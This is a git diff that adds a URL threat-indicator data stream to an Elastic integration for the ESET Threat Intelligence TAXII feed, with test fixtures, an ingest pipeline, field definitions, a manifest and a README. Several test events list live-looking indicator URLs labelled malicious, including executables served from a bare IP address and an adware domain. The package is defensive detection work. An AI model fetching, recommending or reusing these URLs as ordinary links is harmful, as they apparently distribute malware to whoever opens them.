"https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "http://www.iema.net/resources/reading-room/2020/06/26/iema-eia-guide-to-climate-change-resilience-and-adaptation-2020" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--c545b3d8-f6c1-4c8c-a7dc-9b4714fade27", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--c545b3d8-f6c1-4c8c-a7dc-9b4714fade27\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='http://18.204.106.67/736863-1697131982.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "http://18.204.106.67/736863-1697131982.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--a6c01d1c-c14f-4dda-b3a2-7fdeeee59626", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--a6c01d1c-c14f-4dda-b3a2-7fdeeee59626\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='http://www.iztacala.unam.mx/carreras/psicologia/psiclin/vol9num2/vol9n2art1.pdf']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "http://www.iztacala.unam.mx/carreras/psicologia/psiclin/vol9num2/vol9n2art1.pdf" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--6a2c6afd-37f3-4c71-9cd2-3378929115a9", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--6a2c6afd-37f3-4c71-9cd2-3378929115a9\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host is known to be actively distributing adware or other medium-risk software.\", \"pattern\": \"[url:value='https://paphoolred.com/afu.php']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host is known to be actively distributing adware or other medium-risk software.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "https://paphoolred.com/afu.php" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--c2c36c68-b456-41a1-aca8-1329655ed964", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--c2c36c68-b456-41a1-aca8-1329655ed964\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='https://vitrea.macomp.co.il/netfiles/18501a092452EBEDBA048119DD7C4C7869634F6.pdf']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "https://vitrea.macomp.co.il/netfiles/18501a092452EBEDBA048119DD7C4C7869634F6.pdf" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--d2bf6040-34a3-4aee-9f99-779b3ef0c0c4", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--d2bf6040-34a3-4aee-9f99-779b3ef0c0c4\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='http://18.204.106.67/737375-1692567831.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "http://18.204.106.67/737375-1692567831.exe" + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/url/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/url/_dev/test/system/test-httpjson-config.yml new file mode 100644 index 00000000000..c400630e85b --- /dev/null +++ b/packages/ti_eset/data_stream/url/_dev/test/system/test-httpjson-config.yml @@ -0,0 +1,13 @@ +input: httpjson +service: eti +vars: + username: test + password: test +data_stream: + vars: + preserve_original_event: true + url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/1d3208c143be49da8130f5a66fd3a0fa/objects/ + interval: 30s + enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_eset/data_stream/url/agent/stream/httpjson.yml.hbs b/packages/ti_eset/data_stream/url/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..41117cedade --- /dev/null +++ b/packages/ti_eset/data_stream/url/agent/stream/httpjson.yml.hbs @@ -0,0 +1,72 @@ +config_version: "2" + +interval: {{interval}} +request.method: "GET" +{{#if enable_request_tracer}} +request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" +{{/if}} + +auth.basic.user: {{username}} +auth.basic.password: {{password}} + +{{#if url}} +request.url: {{url}} +{{/if}} +{{#if ssl}} +request.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} +{{#if proxy_url}} +request.proxy_url: {{proxy_url}} +{{/if}} + +request.transforms: + - set: + target: header.Content-Type + value: application/taxii+json;version=2.1 + - set: + target: header.Accept + value: application/taxii+json;version=2.1 + - set: + target: url.params.match[type] + value: indicator + - set: + target: url.params.limit + value: {{page_size}} + - set: + target: url.params.added_after + value: '[[ .cursor.timestamp ]]' + default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]' + +response.pagination: + - set: + target: url.params.added_after + value: >- + [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]] + fail_on_template_error: true + +response.split: + target: body.objects + +cursor: + timestamp: + value: >- + [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]] + ignore_empty_value: true + +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/ti_eset/data_stream/url/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/url/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..459c9fffc4e --- /dev/null +++ b/packages/ti_eset/data_stream/url/elasticsearch/ilm/default_policy.json @@ -0,0 +1,23 @@ +{ + "policy": { + "phases": { + "delete": { + "actions": { + "delete": {} + }, + "min_age": "7d" + }, + "hot": { + "actions": { + "rollover": { + "max_age": "2d", + "max_size": "50gb" + }, + "set_priority": { + "priority": 100 + } + } + } + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/url/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/url/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..3485968b65a --- /dev/null +++ b/packages/ti_eset/data_stream/url/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,147 @@ +--- +description: Pipeline for processing URL collection feed +processors: + - set: + field: ecs.version + value: '8.11.0' + - set: + field: event.kind + value: enrichment + - append: + field: event.category + value: threat + allow_duplicates: false + - append: + field: event.type + value: indicator + allow_duplicates: false + - set: + field: threat.indicator.provider + value: eset + - rename: + field: message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + target_field: eti + - drop: + if: ctx.eti?.type != 'indicator' + - set: + field: threat.feed.name + value: "ESET URL stix 2.1" + - date: + field: eti.created + target_field: "@timestamp" + formats: + - "ISO8601" + if: "ctx.eti?.created != null" + - date: + field: eti.modified + target_field: threat.indicator.last_seen + formats: + - "ISO8601" + if: "ctx.eti?.modified != null" + - set: + field: threat.indicator.modified_at + copy_from: threat.indicator.last_seen + if: "ctx.threat?.indicator?.last_seen != null" + - date: + field: eti.valid_until + target_field: eset.valid_until + formats: + - "ISO8601" + if: "ctx.eti?.valid_until != null" + - rename: + field: eti.id + target_field: eset.id + ignore_missing: true + - rename: + field: eti.description + target_field: threat.indicator.description + ignore_missing: true + - foreach: + field: eti.labels + processor: + append: + field: eset.labels + value: "{{_ingest._value}}" + ignore_missing: true + ignore_failure: true + if: ctx.eti?.labels != null + - script: + lang: painless + params: + "malicious-activity": 'High' + "phishing-activity": 'High' + "unwanted-activity": 'Medium' + "benign": 'Low' + if: ctx.eset?.labels != null + source: > + for (def label : ctx.eset.labels) { + if (params.containsKey(label)) { + ctx.threat.indicator.confidence = params.get(label); + break; + } + } + - split: + field: eti.pattern + target_field: eti._patterns + separator: ' OR ' + ignore_missing: true + - foreach: + field: eti._patterns + processor: + grok: + field: _ingest._value + patterns: + - "^\\[url:value%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.original}'\\]?" + ignore_failure: true + - set: + field: threat.indicator.type + value: url + - set: + field: threat.indicator.name + copy_from: eti.name + if: "ctx.eti?.name != null" + - remove: + field: + - eti + ignore_missing: true + - remove: + field: event.original + if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + ignore_failure: true + ignore_missing: true + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - set: + field: error.message + value: '{{ _ingest.on_failure_message }}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/ti_eset/data_stream/url/fields/agent.yml b/packages/ti_eset/data_stream/url/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/data_stream/url/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/data_stream/url/fields/base-fields.yml b/packages/ti_eset/data_stream/url/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/data_stream/url/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/data_stream/url/fields/ecs.yml b/packages/ti_eset/data_stream/url/fields/ecs.yml new file mode 100644 index 00000000000..d3f9633c4c9 --- /dev/null +++ b/packages/ti_eset/data_stream/url/fields/ecs.yml @@ -0,0 +1,36 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name diff --git a/packages/ti_eset/data_stream/url/fields/fields.yml b/packages/ti_eset/data_stream/url/fields/fields.yml new file mode 100644 index 00000000000..bf7e7383df2 --- /dev/null +++ b/packages/ti_eset/data_stream/url/fields/fields.yml @@ -0,0 +1,21 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: 'true' + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_eset/data_stream/url/lifecycle.yml b/packages/ti_eset/data_stream/url/lifecycle.yml new file mode 100644 index 00000000000..326b14e00f6 --- /dev/null +++ b/packages/ti_eset/data_stream/url/lifecycle.yml @@ -0,0 +1 @@ +data_retention: 7d diff --git a/packages/ti_eset/data_stream/url/manifest.yml b/packages/ti_eset/data_stream/url/manifest.yml new file mode 100644 index 00000000000..fe7f03aff9c --- /dev/null +++ b/packages/ti_eset/data_stream/url/manifest.yml @@ -0,0 +1,95 @@ +title: "URL" +type: logs +ilm_policy: logs-ti_eset.url-default_policy +streams: + - input: httpjson + title: URL + description: Collect data from ETI URL feed + template_path: httpjson.yml.hbs + vars: + - name: url + description: URL with API root and identifier of URL collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514) + type: text + title: Collection URL + multi: false + required: true + show_user: true + default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/1d3208c143be49da8130f5a66fd3a0fa/objects/ + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: false + default: 1m + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@: + - name: interval + type: text + title: Interval + description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 1h + - name: initial_interval + type: text + title: Initial Interval + multi: false + required: true + show_user: false + default: 48h + description: How far back to look for indicators the first time the agent is started. Supported units for this parameter are h/m/s. + - name: page_size + type: integer + multi: false + required: false + default: "1000" + show_user: false + title: Page size + description: Maximum number of records to pull in one request. + - name: ssl + type: yaml + title: SSL + multi: false + required: false + show_user: false + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - eset-url + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original` + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: > + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + diff --git a/packages/ti_eset/data_stream/url/sample_event.json b/packages/ti_eset/data_stream/url/sample_event.json new file mode 100644 index 00000000000..015da599a17 --- /dev/null +++ b/packages/ti_eset/data_stream/url/sample_event.json @@ -0,0 +1,69 @@ +{ + "@timestamp": "2023-10-19T02:00:13.000Z", + "agent": { + "ephemeral_id": "47910f1c-df41-4011-adb3-74b1ad882384", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.url", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--8986619a-150b-453c-aaa8-bfe8694d05cc", + "labels": [ + "benign" + ], + "valid_until": "2023-10-21T02:00:13.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:23:28.010Z", + "dataset": "ti_eset.url", + "ingested": "2024-03-27T14:23:40Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:13.000Z\",\"description\":\"Host actively distributes high-severity threat in the form of executable code.\",\"id\":\"indicator--8986619a-150b-453c-aaa8-bfe8694d05cc\",\"labels\":[\"benign\"],\"modified\":\"2023-10-19T02:00:13.000Z\",\"name\":\"https://example.com/some/path\",\"pattern\":\"[url:value='https://example.com/some/path']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:13Z\",\"valid_until\":\"2023-10-21T02:00:13Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-url" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-19T02:00:13.000Z", + "modified_at": "2023-10-19T02:00:13.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "https://example.com/some/path" + } + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/docs/README.md b/packages/ti_eset/docs/README.md new file mode 100644 index 00000000000..144a8a35c39 --- /dev/null +++ b/packages/ti_eset/docs/README.md @@ -0,0 +1,1120 @@ +# ESET Threat Intelligence Integration + +This integration connects with the [ESET Threat Intelligence](https://eti.eset.com/taxii2/) TAXII version 2 server. +It includes the following datasets for retrieving logs: + +| Dataset | TAXII2 Collection name | +|--------:|:-----------------------| +| apt | apt stix 2.1 | +| botnet | botnet stix 2.1 | +| cc | botnet.cc stix 2.1 | +| domains | domain stix 2.1 | +| files | file stix 2.1 | +| ip | ip stix 2.1 | +| url | url stix 2.1 | + +## Expiration of Indicators of Compromise (IOCs) +The ingested IOCs expire after certain duration. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created for every source index to +facilitate only active IOCs be available to the end users. Each transform creates a destination index named `logs-ti_eset_latest.dest_*` which only contains active and unexpired IOCs. +Destinations indices are aliased to `logs-ti_eset_latest.`. + +| Source Datastream | Destination Index Pattern | Destination Alias | +|:-------------------------|:-----------------------------------|-----------------------------| +| `logs-ti_eset.apt-*` | logs-ti_eset_latest.dest_apt-* | logs-ti_eset_latest.apt | +| `logs-ti_eset.botnet-*` | logs-ti_eset_latest.dest_botnet-* | logs-ti_eset_latest.botnet | +| `logs-ti_eset.cc-*` | logs-ti_eset_latest.dest_cc-* | logs-ti_eset_latest.cc | +| `logs-ti_eset.domains-*` | logs-ti_eset_latest.dest_domains-* | logs-ti_eset_latest.domains | +| `logs-ti_eset.files-*` | logs-ti_eset_latest.dest_files-* | logs-ti_eset_latest.files | +| `logs-ti_eset.ip-*` | logs-ti_eset_latest.dest_ip-* | logs-ti_eset_latest.ip | +| `logs-ti_eset.url-*` | logs-ti_eset_latest.dest_url-* | logs-ti_eset_latest.url | + +### ILM Policy +ILM policy is added to the source indices, so it doesn't lead to unbounded growth. +Data in these source indices will be deleted after a certain number of days from ingested days: + +| Index | Deleted after | Expired after | +|-----------------------:|:--------------|---------------| +| `logs-ti_eset.apt` | 365d | 365d | +| `logs-ti_eset.botnet` | 7d | 48h | +| `logs-ti_eset.cc` | 7d | 48h | +| `logs-ti_eset.domains` | 7d | 48h | +| `logs-ti_eset.files` | 7d | 48h | +| `logs-ti_eset.ip` | 7d | 48h | +| `logs-ti_eset.url` | 7d | 48h | + +## Requirements + +Elastic Agent must be installed. +For more information, +refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, +and manage your agents in a central location. +We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, +you install Elastic Agent and manually configure the agent locally on the system where it’s installed. +You are responsible for managing and upgrading the agents. +This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. +Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, +and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, +refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **Kibana version** required is **8.12.0**. + +## Setup + +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations. +2. In "Search for integrations" search bar, type ESET Threat Intelligence. +3. Click on the "ESET Threat Intelligence" integration from the search results. +4. Click on the "Add ESET Threat Intelligence" button to add the integration. +5. Configure all required integration parameters, including username and password that you have received from ESET during onboarding process. For more information, please visit [ESET Threat Intelligence](https://www.eset.com/int/business/services/threat-intelligence/) page. +6. Enable data streams you are interested in and have access to. +7. Save the integration. + +## Logs + +### Botnet + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.id | The UID of the event object. | keyword | +| eset.labels | Threat labels. | keyword | 